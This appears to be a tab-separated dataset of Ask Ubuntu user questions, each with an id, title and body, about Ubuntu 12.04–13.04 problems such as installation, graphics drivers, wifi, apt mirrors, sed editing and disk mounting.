290044	partitioning issue on already installed ubuntu when re-installing	scenario : ubuntu 13.04 is already installed with seperate promary partitions for - uefi boot area /boot /home / swap attempt to reinstall ubuntu 13.04 and in the partitioning options , select 'something else' problems : although the existing partitions are shown , none have the filesystem format and mount point fields populated in the table . i sometimes am given the option of uefi boot area partition , and sometimes i am not - leaving me with just the bios boot area partition option . which partition/device to select to install grub on at the bottom drop down option ? which partition to select if i want to re-install ubuntu without affecting the /boot and /home partitions selecting any partition and trying to re-install always show a different partition size as available .
290056	how can i change the non-overlay scroll bar width in lubuntu 13.04 ?	how to change the non-overlay scroll bar width in lubuntu 13.04 ? it is too thin for me .
290060	black screen when trying to install ubuntu	i 'm trying to install ubuntu on my laptop , booting from a cd . however , when click `` install ubuntu '' from the grub the screen goes to black . so far i 've tried the following all with no result : booting `` try ubuntu '' booting with 'nomodeset' booting with 'drm_kms_helper.poll=0' removing all usb- and other connections from my laptop before booting these are all the possibe solutions i have found online so far ... here are some more specifics : ubuntu 12.04 asus r500v with windows 8 installed nvidia graphics card does anybody know what could be the problem ?
290063	using previously downloaded debian packages for upgrading to ubuntu 13.04	before upgrading to ubuntu 13.04 i downloaded most of required .deb packages separately . now i have a folder with a lot of .deb packages needed for upgrade . how can i upgrade to ubuntu 13.04 using terminal in a way that the upgrade process uses my downloaded packages and will not re-download them separately ? ( however it may need to download the packages that i have not downloaded . )
290064	ubuntu 13.04 pidgin tray	does not show the current status of pidgin in the system tray . status always is offline . how i can fix this ? ps : pidgin works fine .
290074	nautilus in gnome 3.8 does n't remember any view settings	since i changed from unity to gnome 3.8 , nautilus has not remembered any view options : every time i launch nautilus , hidden files are displayed nautilus does n't remember view settings for any folders ( e.g . i change to sort by date modified , descending , in ~/downloads , but next time i start nautilus it has forgotten ) . any ideas what could be causing this ? thanks .
290078	ubuntu 12.04.2 upgrade issue	before the upgrade ( ubuntu web server ) was run , i had run apt-get auto-remove . upgrade went forward and failed . currently not able to connect to it . sudo networkmanager says : command not found can not run apt-get install , upgrade as it says dpkg was interrupted and asks to run dpkg -- configure -a but this get stuck at : 'configuring postgresql-common ' screen says 'the postgresql version 8.4 is obsolete ... . '' any ideas appreciated .
290082	change specific lines using sed	i have a html file and i want to edit from 8th line till next to the last line i.e no changes to 1-7 and the last line with sed utility . example : line 1 < i > some text < i > line 2 < i > some text < i > line 3 < i > some text < i > line 4 < i > some text < i > line 5 < i > some text < i > line 6 < i > some text < i > line 7 < i > some text < i > line 8 < i > some text < i > line 9 < i > some text < i > line 10 < i > some text < i > s < i > some text < i > o < i > some text < i > - < i > some text < i > o < i > some text < i > n < i > some text < i > line n < i > some text < i > to line 1 < i > some text < i > line 2 < i > some text < i > line 3 < i > some text < i > line 4 < i > some text < i > line 5 < i > some text < i > line 6 < i > some text < i > line 7 < i > some text < i > line 8 some text line 9 some text line 10 some text s some text o some text - some text o some text n some text line n < i > some text < i > how can i ? thanks in advance for suggestions and help . regards
290087	eclipse installation error	when i install eclipse helios in ubuntu extract the eclipse.xx.yy.tar.gz using tar -zxvf eclipse.xx.yy.tar.gz become root . sudo su copy the extracted folder to /opt cp -r eclipse.xx.yy /opt create a desktop file and place it into /usr/share/applications gedit /usr/share/applications/eclipse.desktop and copy the following to the eclipse.desktop file . [ desktop entry ] name=eclipse type=application exec=eclipse terminal=false icon=eclipse comment=integrated development environment nodisplay=false categories=development ; ide name [ en ] =eclipse create a symlink in /usr/local/bin using cd /usr/local/bin ln -s /opt/eclipse/eclipse for eclipse icon to be displayed in dash , eclipse icon can be added as cp /opt/eclipse/icon.xpm /usr/share/pixmaps/eclipse.xpm it give below error : bash : /usr/local/bin/eclipse : no such file or directory
290092	how to display apparmor denied messages as desktop notifications	how can i get live notifications on my desktop whenever an apparmor denied message is triggered ?
290094	libdb4.8++ is no longer available	i 'm trying to use qt-creator to build a program and i get the message that libdb4.8++ is needed and is not available . i 've tried to use libdb5.1 and libdb4.8 but it still asks for libdb4.8++ i 'm currently using ubuntu 12.04 lts . what version of ubuntu would be compatible with libdb4.8++ if there is no way to install it ?
290099	how to run a script during boot as root	i had a script that automatically enables my wifi without using networkmanager , but i do n't know how to run the script as root while the system is booting . how do i make the script run automatically during boot ?
290101	how to change the ubuntu volume control slider color	is there any way to change the color of the volume control slider ? i wish to change it from orange to light blue , or blue , but i can not find where i need to go to make the change , sine i already modified the radiance theme to be on the blue color range . screenshot of how it is now : how i want it to be :
290104	i ca n't run apache ( ubuntu server )	i ca n't run apache ( ubuntu server ) this is my output in terminal : root @ srv etc/init.d/apache2 start * starting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 2a01:4f8:191:61af : :2 for servername ( 98 ) address already in use : make_sock : could not bind to address [ : : ] :80 ( 98 ) address already in use : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . how to fix it ?
290109	how to disable search in nautilus 3.6 while typing text !	when i am typing for a file in any folder it searches for that file and gives results of the text i entered instead of just searching in the current folder . how do i get nautilus 3.4 feature of finding a file in current folder on type instead of searching ? any help will be appreciated !
290110	warning : kernel is not very fresh , upgrade is recommended	sometimes when running ping , i see the following : $ ping somehost ping somehost ( 192.168.x.x ) 56 ( 84 ) bytes of data . warning : kernel is not very fresh , upgrade is recommended what causes this warning , and can i ignore it ? i 'm actually running a relatively new kernel ( 3.5.0-17-generic ) .
290115	how do i open specific applications on specific workspaces in lubuntu 13.04	i 'm running lubuntu 13,04 and have four workspaces set up . i want certain programs to open in a specfic workspace every time ( like boinc in workspace 4 , an application for writing books in workspace 2 , etc ) . i 've looked at a few other posts on the subject -- but they 're all for ubuntu and unity . i tried devilspie , but it would n't open ( technically it was gdevilspie that would n't open ) . i do n't have compiz , as i 'm on lxde , so the ccsm options are out . any suggestions are greatly appreciated . have a great day . : ) patrick .
290116	skype segfaults - 13.04 with no proprietary drivers	i have a lenovo x230 ( not the tablet ) with ubuntu 13.04 ( upgraded using the update manager from 12.10 ) . i have no proprietary drivers installed . skype crashes with segmentation fault skype is installed from the official ubuntu repo : ~ $ apt-cache policy skype skype : installed : 4.1.0.20.0-0ubuntu0.13.04.2 candidate : 4.1.0.20.0-0ubuntu0.13.04.2 version table : *** 4.1.0.20.0-0ubuntu0.13.04.2 0 500 http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages 500 http : //archive.canonical.com/ raring/partner amd64 packages 100 /var/lib/dpkg/status kernel used : 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux kernel package is also installed from the usual place : linux-image-generic : installed : 3.8.0.19.35 candidate : 3.8.0.19.35 version table : *** 3.8.0.19.35 0 500 http : //fi.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status
290120	ubuntu server boots , then shows blinking cursor	my ubuntu server boots but then shows a blinking cursor . it passes grub and i get the boot log output and all seems fine , however i get no shell after booting . i can boot into recovery just fine however i am now unable to ssh in as my network configuration has changed . can anyone aid me in troubleshooting this issue ? thanks
290122	can i use juju/maas on vpses ?	i was wondering if i can setup maas on set of vpses and manage them with juju but i see no way to manualy install maas node ( is it even possible ? ) . i know i 'm missing core point in whole maas-game by installing node manualy but i can not run ubuntu installation on my vpses and i can not run dhcp server , on provider 's infrastructure . or is there another way to use juju with vpses ? or maybe it will be possible in future with juju 2.0 ?
290130	nvidia geforce gt630 resolution problem	i installed the drivers but the maximum resolution i can get is 1360x768 . can i get to 1920x1080 ? on windows it worked fine . edit : i have ubuntu 12.04.2 lts
290145	intel centrino wireless-n 2230 wifi gets disconnected after some time	i 'm using a dell laptop the wifi turns off automatically after some time and only if i restart the machine it work this happens very often i have already tried the mtu method it is in automatic and this problem happens in both college ( proxy ) and home networks ( no proxy ) and deleting the connections from the menu and turning off and on the wifi doesnt work is there any permanent solution for this *-network description : wireless interface product : centrino wireless-n 2230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : c4 serial : 68:5d:43:5e : b1 : f9 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-19-generic firmware=18.168.6.1 ip=192.168.40.202 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:45 memory : c1500000-c1501fff
290152	fickle wifi on sonicwall routers	i 'm having trouble connecting to some sonicwall routers in ubuntu ( but it sadly works fine in windows ) . oddly enough , it will occasionally connect and allow me to use the internet as usual , but it will often kick me off again within 10 minutes ; i 'm using the standard iwlwifi driver , but i have also tried others and they do n't seem to work either . i also looked into using ndis wrapper and the proprietary windows driver , but that complains that the `` hardware is not present . '' what kind of debugging can i try ? is there a log file that might reveal the real problem ? perhaps a verbose mode i could turn on ? the only error message i could procure was something like `` failed to activate non active driver . '' here 's an example mac address of a wireless router that i 'm trying to connect to : 00:17 : c5 : a5 : e8 : de here 's the output of sudo lshw -class network ( when connected to a different , working wifi network ) : *-network description : wireless interface product : centrino advanced-n 6205 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : a0:88 : b4 : b5 : b3 : f0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-41-generic firmware=18.168.6.1 ip=10.0.0.7 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:46 memory : f2400000-f2401fff here is my wireless card info from lspci : 03:00.0 network controller : intel corporation centrino advanced-n 6205 ( rev 34 ) besides speed , windows has no problem with the routers ; macbooks seem to be better than ubuntu but are still subject to disconnectivity . i 've not had problems connecting to other routers in ubuntu , so i was surprised when it simply failed to work . since i 've occasionally successfully connected with both a random mac address and my normal mac address , i 'm almost positive that it 's not mac address white listing or black listing . the frustrating part is not that it does n't work , but that it works fine in windows and not in ubuntu . could the problem be the number of routers with the same essid ? on a side note , i 'm currently using an os based off of ubuntu 12.04 lts and not a `` vanilla '' install , but i 've also encountered the same problem with regular ubuntu 12.04 and 12.10 . has anyone at least encountered this before or know of a solution to the problem besides getting new routers ?
290157	appindicator icon animation	i 'm writing a software using pygobject for gtk+3 ( ubuntu 12.04 , stable repo package versions for all dev tools ) and i 'd like my application to have animated appindicator icon . it 's easy to make glib.timeout and emit set_icon signal every time frame changes . but nevertheless appindicator icon is not redrawn immediately . so the question is : `` is there any way to make appindicator icon force redraw ? '' . for now it redraws once per several seconds without any stable period or sometimes when mouse activates top panel widgets .
290159	how can i use gsettings to configure settings with relocatable schemas ?	i am trying to configure a setting with gsettings in the terminal , to avoid having to install special non-default applications to configure the settings . however , when doing so , gsettings complains the setting has a relocatable schema and does nothing . # : gsettings set org.compiz.unityshell dash-blur-experimental 1 schema 'org.compiz.unityshell ' is relocatable ( path must be specified ) how can i set the value with the gsettings command ?
290161	apt-get update fails to find some mirrors	i 've configured my sources to use the mirrors : // `` protocol '' to find servers close to me , mainly since i move around a lot . however , for some reason it does n't work for all the repos - when i run sudo apt-get update i get a bunch of errors ( about 45 ) like the following : w : failed to fetch mirror : //mirrors.ubuntu.com/mirrors.txt/dists/raring/main/source/sources 404 not found [ mirror : http : //giano.com.dist.unige.it/ubuntu/ ] w : failed to fetch mirror : //mirrors.ubuntu.com/mirrors.txt/dists/raring/universe/source/sources 404 not found [ mirror : http : //giano.com.dist.unige.it/ubuntu/ ] if i remember correctly , i configured this through the gui , but i still went and looked what the lines corresponding to those repos said in /etc/apt/sources.list - this is what i found : deb-src mirror : //mirrors.ubuntu.com/mirrors.txt raring main restricted deb-src mirror : //mirrors.ubuntu.com/mirrors.txt raring universe ( i could n't map all the errors to lines from sources.list , but i guess that 's just because i 'm not 100 % sure what i 'm looking for ... ) i thought the whole point of configuring the sources like this was to make sure that mirrors.ubuntu.com chooses a mirror that has the repositories you need . why am i getting 404 errors here , and what can i do about it ? i 'd prefer to still use the mirrors setup , rather than hard-coding specific servers to get everything from , if it 's possible . update : thanks to helpful comments in the first couple of answers , i 've been able to rule out both server maintenance and firewall issues - i have no problem getting other things from the same server , using the mirror protocol . the problem is that the sources are n't available on the mirror i 'm pointed to . in other words , all the packages are there , so lines in sources.list that start with deb have no problems , but deb-src lines fail . i 've also verified by opening e.g . http : //giano.com.dist.unige.it/ubuntu/dists/raring/main/ in my browser . according to the error message , apt-get looks for a subdirectory of this diriectory called source , which does n't exist . so the problem is not connecting to the server , but that the server does n't have the resources i 'm looking for . i assume it 's up to the mirror to decide whether they want to provide the sources as well or just the packages , but i 'm surprised that mirrors.ubuntu.com serves me a mirror that does n't have what i ask for . i see three options , and i do n't like either : hard-code the sources for deb-src resources to servers where i know they are available , i.e . sacrifice the mirror protocol in these instances . uncheck source pacakges in software sources , i.e . sacrifice downloading sources for the packages . ignore the error messages from apt-get and hope mirrors.ubuntu.com points me to a different server in the future . is there a fourth option , that actually solves the problem ? = )
290165	will gcc > = 4.7 ever come officially to 12.04 ?	we have ubuntu 12.04 lts installed at our systems , and we would like to use gcc > = 4.7 for c++11 support . will a version of gcc > = 4.7 be added to the standard repositories ( any time soon ) or will the never happen ? kind regards , thomas
290167	change a string keeping some text as it is using sed	i have got another problem here with sed . i wan na add some text to a string but with out changing a particular word which varies with every line . or wrap a code on a string keeping it as it is . example : from < font color= '' # 000000 '' > < p align= '' justify '' > coat . how are you . < font color= '' # 000000 '' > < p align= '' justify '' > money.where are you . < font color= '' # 000000 '' > < p align= '' justify '' > food.what are you . < font color= '' # 000000 '' > < p align= '' justify '' > car.which are you . < font color= '' # 000000 '' > < p align= '' justify '' > quality.when are you . to < b > < font color= '' # 000000 '' > < p align= '' justify '' > coat. < /b > how are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > money. < /b > where are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > food. < /b > what are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > car. < /b > which are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > quality. < /b > when are you . again thanks in advance . regards .
290169	changed 'txt.cfg ' file in a lubuntu live usb and now its 'read only '	well , i was looking for edit the txt.cfg file in /cdrom/syslinux/ directory to add my locale configuration and it chooses my keyboard settings automatic . and to bypass the try ubuntu screen . but i forget , i use the usb stick with persistence . when changing the file content i forget to mention this in the append line ... no backuped the old content . now the usb boot shows the try ubuntu without changes screen , with just one option , and choose language like i 've write , but no persistence . when tryed to change the file content again , i was unable . the system now gaves me an error message , saying the file is read only , even with sudo powers . how to change this again and come back with my persistence ?
290172	something wicked happened cant solve as i am behind proxy server	i am getting a lot of something wicked happened resolving extras.ubuntu.com : http like errors when trying to install anything or updating using sudo apt-get command . i found some solution but they all suggested using automatic proxy detection method . as i am behind a specified server that does n't work for me . can anyone suggest me something ? my internet connection seems to be working fine . my proxy ip is 172.31.100.14. ping 172.31.100.14 works fine but ping www.google.com show error like network host unreachable . please help . thanking you .
290173	nvidia 319.17 - 640 x 480 screen and no unity post reboot	just asking , i am running 13.04 64bit on a lenovo t430 with nvidia optimus capable card . i tried the following instructions to enable the driver sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings cd /tmp wget http : //it.download.nvidia.com/xfree86/linux-x86_64/319.17/nvidia-linux-x86_64-319.17.run chmod +x nvidia-linux-x86_64-319.17.run sudo apt-get -- purge remove xserver-xorg-video-nouveau sudo service lightdm stop cd /tmp sudo sh nvidia-linux-x86_64-319.17.run confirm answering yes / ok to all the questions and at the end type : sudo reboot -h after the reboot and logging in the x window was i guess a small 640x480 screen and no unity was loaded . i.e just the desktop , i 've since reinstalled ... was just a basic install . but was there anything i did wrong or should do additionally or differently to get it to work . thanks
290174	setting up 802.3ad for true 2gb/s link aggregation	i have been trying for a few days and reading many posts/resources online but am getting nowhere ... i have found so many frustratingly unanswered topics such as - http : //ubuntuforums.org/showthread.php ? t=1572502 or http : //ubuntuforums.org/showthread.php ? t=1572502 . basically , i have a load of switches with 1gb uplinks and we have successfully enabled link aggregation between many of the bottlenecks and see 2gb/s ( -overhead ) being sent across the links . i have a server hosting items that constantly is at 100 % network utilisation . long term plan is to move to 10gb nics , but , that wo n't happen for a while . i have followed every guide i can find about 802.3ad support and i am basically in the same state as this post - http : //ubuntuforums.org/showthread.php ? t=1572502 ... i have fault tolerance in that i can bring either eth0 or eth1 down and the other will immediately pick up , however , i just ca n't seem to get more than 944mb/s to be sent or received . can anyone help ?
290179	13.04 upgrade with nvidia	ubuntu 13.04 upgraded from 12.10 3.8.0-10-generic nvidia geforce 310 r a2 ( gt218 ) graphics card samsung 1920x1200 display i received the notice to update to 13.04 the other day and i accepted it - that was a mistake . now 3 days later i still do n't have x back alive . the upgrade did not reboot with nvidia working . i have tried all types of things including downloading the 313.30 driver and installing it . after that i can boot to the x login - and log in - but the display is trying to run at 640x480 and there is no way to get to a terminal ( or anything ) - i just see the background . i can get to a terminal via ctrl-alt-f1 and log . however , i ca n't figure out how to get a proper xconfig file structured to work . any suggestions ?
290184	battery indicator missing for amd 64 raring	i dont find the battery indicator for my amd 64 toshiba satellite . it points to this resource which is not found : http : //ppa.launchpad.net/iaz/battery-status/ubuntu/dists/raring/main/binary-amd64/packages any fix available ? my notebook shuts down without any notice .
290192	unable to save anything to cd , disc mounts as read-only	i have recently upgrade to ubuntu 13.04 64 bits and now i ca n't save nothing to cd . the cd is mounted automatically when i introduce a cd-rom but in gnome-disks shows : $ dmesg | grep sr0 sr0 : scsi3-mmc drive : 48x/48x writer dvd-ram cd/rw xa/form2 cdda tray sr 18:0:0:0 : attached scsi cd-rom sr0 sr 18:0:0:0 : [ sr0 ] cdb : $ ll /dev/sr0 brw-rw -- -- + 1 root cdrom 11 , 0 may 3 17:23 /dev/sr0 when i use brasero or k3b , apparently they save the files to cd but when i mount the used cd-rom , it contains nothing . for example , i try to create an audio cd with several mp3 files and this is the output of k3b : debug output of k3b
290194	how to install autoconf	i need to install tesseract , that need to install autoconf automake libtool , however i got the error as follows : sahu @ sahu-desktop : / $ sudo apt-get install autoconf reading package lists ... done building dependency tree reading state information ... done package autoconf is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'autoconf ' has no installation candidate so please help me .
290200	slow updates and software downloads : due to newly released version ?	i installed ubuntu 12.10 and am greeted with an update requiring the download of 300mb update files . i commenced with this update but the download speed is painfully low ( several bytes/sec ) . however , browsing the net and downloading from the browsers do n't seem to present such speed problems ; they 're doing fine . i also tried downloading softwares using apt-get as well as via software center . both present dismal download speeds . i tried to change my mirrors as outlined here : how can i get apt to use a mirror close to me , or choose a faster mirror ? i have tried switching to different mirrors . even tried using `` best server '' a couple of times but it does n't improve my speeds . now , i am aware that ubuntu 13.04 was released less than two weeks ago . my question is , are my rock-bottom software download speeds caused by servers being overload by people upgrading to the new release , or is it caused by some other problem ? i do n't know if 2 weeks is long enough for servers to recover from overload . i 've tried switching servers in the software sources but to no avail . if it is because of the recently ( if 2 weeks is recent ) released version , how long will it take to get my speeds back up again ? if it is n't , how do i resolve this issue ? i am a beginner in ubuntu/linux .
290201	how do i upgrade from ubuntu 12.04 to ubuntu 13.04 with an .iso image ?	i have ubuntu 12.04 installed on my system . i want to upgrade it to ubuntu 13.04 . i want to do this upgrade using an .iso image of ubuntu 13.04 and without a usb drive . i tried how to upgrade ubuntu from an iso image . but it did n't work for me . after running the proposed commands , i did n't have any alerts about updating . i also do n't understand the gksu part of the solution . also , is this possible to do by using a networked computer ? by this i mean the .iso file is on another computer .
290202	how can i get rid of of wine 's steam icon in the dash ?	using ubuntu 13.04 : i decided it was time to uninstall the windows version of steam i was running through wine . so i used wine 's uninstall applications function to remove it and all its files . then i used ubuntu 's software centre to uninstall wine and the windows compatibility layer . the problem is that , in unity , if i search 'steam ' , the image for the windows version still appears . click it , nothing happens . drag to desktop and delete , nothing happens . used the command line to remove and then purge steam . on the desktop , no result . how can i correct this ?
290203	ca n't connect to wifi with adapter	i 've installed ubuntu 12.04 lts on my 8 year old desktop to use it as a kind of mediahub . there only is wifi here and the machine does n't have a card for wireless , so i bought a gembird wnp-ua-001 ( a usb wifi adapter ) . the os uses the adapter and 'sees ' the network and i 'm able to type in the password . but it just wo n't connect ! ? ( and yes , the password is right : p ) does anyone knows how to solve this ? thanks in advance !
290208	install ubuntu on macbook pro 6.2	i am trying to install ubunut on mac book pro 6.2 , i found out that there is a specific release of mac . 64-bit mac ( amd64 ) desktop image but it is not working for me , when ever i try to boot from it i got black screen with cursor blinking , directly without getting the image to try or install ubuntu . i tried both 12.10 and 13.04 while when trying the stock 64-bit pc ( amd64 ) desktop image it works directly and i am able to install ubuntu . i want to try the mac version to see if my dual vga ( intel and nvidia ) will work . any idea why is that ?
290211	13.04 + gnome 3.8 integrated input methods now working	it was stated that in gnome-shell 3.8+ was released integrated input method where i would not need to take care of setting up ibus and deal with enabling/disabling it every time . since i always use 3 languages one of which requires ibus i decided to give it a try in virtualbox . so i 've installed latest stable ubuntu gnome ( 13.04 ) , added ppa for gnome and did apt-get update & & apt-get dist-upgrade . but seems that this announced feature does n't work . i added needed languages and indicator-applet shows that i switch between them , but language requiring ibus ( chinese in this case ) still uses standard layout and all i enter is just roman characters . is there anything i am missing or have done wrong ?
290216	installation error while installing from cd-rom	i am trying to install ubuntu 12.04 . and i have windows 7 already installed . but while installing through cd-rom i 'm getting this error : unable to find medium for connecting live file system
290237	how can i stop my xubuntu heating up my toshiba l600-01b	well , guys , i will not have my first time seek for you all on this site unless my totally unbearable to the fan noise my xubuntu making . it 's a time for me to stay with this stuff working for my programming job feeling too terrible to prevent me from killing it . i 've tried fglrx , kernel parameter `` pcie_aspm=force '' , shutting off pulseaudio , apt-getting xfce4-power-manager-plugins and many other tricks , including some shell . but those do just not work . i think this is hard . could some one help me ?
290243	hp photosmart c7200 bad margins	i 'm running ubuntu 13.04 . i have an hp photosmart c7280 printer , for which i 'm using the recommended driver , `` hp photosmart c7200 series , hpcups 3.13.3 '' . i 'm printing on a4 paper , and in the printer properties i 've selected `` a4 borderless '' paper . but when i print , the top 13mm and the bottom 30mm of the page are cut off . i can turn on `` scale to fit '' in the printer job options . in that case the whole page is printed , but scaled-down , which is not very useful . how do i get my printer to use all of the paper ? ( the missing 30mm at the bottom is particularly annoying . )
290245	ca n't get into factoryreset due to power reset or unknown upload mode	i 'm trying to follow the steps in https : //wiki.ubuntu.com/touch/install with a galaxy tab , and holding down volume up + down + power for 10 seconds to perform a factory reset . instead , i 'm stuck with this message : power reset or unknown upload mode
290247	bluetooth isnt working asus x401a running raring 13.04	my bluetooth is not working . i have searched many threads and looked at many solutions and i ca n't seem to find anything . help would be much appreciated . i have a asus x401a running ubuntu 13.04 raring if i type in rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no the output of lsmod is : bluetooth 228619 10 bnep , rfcomm the output of hcitool dev is : devices : *no devices* the output of dmesg | tail : [ 748.119475 ] ath : doing eeprom country- > regdmn map search [ 748.119479 ] ath : country maps to regdmn code : 0x37 [ 748.119483 ] ath : country alpha2 being used : gb [ 748.119486 ] ath : regpair used : 0x37 [ 748.119513 ] cfg80211 : regulatory domain changed to country : gb [ 748.119516 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 748.119522 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 748.119526 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 748.119531 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 748.119537 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) seriously dont know what do to , would love some help ! ! ! update also when i open up bluetooth manager , it lets me toggle the switch between on and off but will not let me change the visibilty so maybe the bluetooth is one but invisible to everyone ? ? ?
290249	error while updating via terminal from ubuntu 12.10 to ubuntu 13.04	i get this error multiple times ( and these codes underneath still run for some reason ) this likely means that your installation is broken . try running the command : gdk-pixbuf-query-loaders > /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache to make things work again for the time being . processing triggers for menu ... dpkg : libreoffice-core : dependency problems , but removing anyway as you requested :
290255	can i add luks/lvm to an already installed ubuntu system ?	i know how to install a luks/lvm ubuntu system using the alternative cd . is it possible to do this with an already installed normal system ? meaning that i have an unecrypted system now and do n't want to do a reinstall for luks/lvm .
290264	how to remove libre.fm from rhythmbox ?	as i do not use libre.fm , i 'd like to remove it from the sidepane in rhythmbox ( ubuntu precise ) . i did it some time ago on of my machines . but now i can not recall how i did it . : - ( i could not find a plugin to deactivate , or a package to uninstall .
290272	update evince oneiric	i would like to update evince to the newest version ( 3.6.1 ) in oneiric . when i do apt-cache show evince i get package with this version : 3.2.1-0ubuntu2.3 so i downloaded the newest version with firefox and tried installing it i get : dependency is not satisfiable : libevdocument3-4 ( = 3.6.1-1ubuntu2 ) , i had libevdocument3-3 installed . i tried deinstalling libevdocument3-3 to see which packages depend on it . none do ( after i deinstalled evince ) , but i do n't know how to install libevdocument3-4 . so i have no idea how to update to default document viewer ... help is appreciated , thanks in advance !
290275	why does ubuntu software center crash on ubuntu 13.04 ?	when i click to open it , it comes up and then it crashes . please help me fix this ( also happens with ubuntu tweak ) . i ran the software center from the terminal and got this error : ( software-center:18008 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 1523 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped )
290276	setting up mail server on ubuntu 12.04.2 server	based on this article http : //iain.it/linux/how-to-install-php-fpm-and-nginx-on-ubuntu-12-04 i 've built my lemp web server . i need one more function to work : mail . it 's production server and i ca n't do any mistake . i tried to set up mail server with tasksel utility . i selected no configuration profile . but php mail function does n't worked . what are the steps to do to get work nginx - php-fpm server with mail server so that i can use standard mail functions on php code on ubuntu server 12.04.2 ?
290277	vlc player fails with python errors	unable to import files and play any audio video file also unable to install vlc player . showing following error : required plugin could not be found . python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder .
290280	installing phpmyadmin 4.x	i am writing on behalf of a friend . he wants to know how to install phpmyadmin 4.x on ubuntu 13.04 . he already installed the phpmyadmin package but this one is the 3.5.8 version . so how would he go about downloading and updating the installed version to phpmyadmin 4.x .
290281	transfer speeds - running ubuntu from external hdd via esata	would it be too slow to run ubuntu from an external hdd via esata or would i not tell the difference ?
290287	how to run two parts of codes of bashscript simultaneously while one of them is infinite while loop	i have this bash script code and i want to run the read command side by side with the while loop as the read command fetch data from user and save it in some file and the while loop do checking on a related something , so any suggestions like doing them in both terminals or something like that thanks # ! /bin/bash trap `` echo \ '' \ '' > /home/ ... ... ... /file.txt '' sigint sigterm sighup while sleep 2 do read -s -n 1 key if [ [ $ key = `` '' ] ] ; then echo > > somefile else echo `` you pressed ' $ key ' '' fi clear done while sleep $ sleepinterval do i=0 while read line do somecommands done
290291	login screen on my desktop error	when i log in my ubuntu 13.04 account , my login screen still shows up as my desktop background , making my computer slow . recently , i made some changes when i log in , such as removing both `` guest login '' and `` remote login . '' i used the following code : sudo gedit /etc/lightdm/lightdm.conf and changed my default login information : user-session=ubuntu greeter-session=unity-greeter to this : user-session=ubuntu greeter-session=unity-greeter allow-guest=false greeter-show-remote-login=false i feel like this was the source of the problem so i tried to delete the added lines but the file was `` read only . '' is there anyway i can edit the file to fix my problem ? also , is there anything else i can do so my desktop can return back to normal without the login screen showing ? i just recently downloaded ubuntu 13.04 a couple of days ago so i 'm only a beginner .
290293	how can i install the `` third party '' software option after i 've skipped it in the installer ?	i did not select [ ] install this third-party software when installing 13.04 . is there a way i can get those software items ? install over existing ? ( i may be missing something to get spring sts to be able to open/launch . )
290294	unable to mount secondary hard drive	i have a fresh installation of ubuntu ( 64-bit ) . and now i have realized that i am unable to mount any partition of my secondary hard drive . i 'm getting this error : error mounting /dev/sdb2 at /media/klemen/local disc : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/klemen/local disc '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option i need to mention that i was able to navigate in those partitions right after the ubuntu installation and now , after 2 hours i am unable to mount them again . so obviously it is my fault . but the only potential harmful installation that i did was installing the amd catalyst driver .
290300	enlarge `` persisitent '' image on usb stick after installation ?	i installed ubuntu 12.04 on a usb pendrive using an installer provided by my my employer ( the idea is to use ubuntu instead of the preinstalled os to use the business notebook also for private purposes ) . this installer seems similar to the pendrive install and uses a persistent image on the usb stick to save data . this image is mounted at /cow . so far the system runs fine . i used ( only ) 1gb for the persistent image . i would like to enlarge it without reinstalling the ubuntu system . how do i do this ? i have access to a second computer ( macbook ) and i can use the shell , but i 'm a little unsure as how to proceed . any ideas welcome !
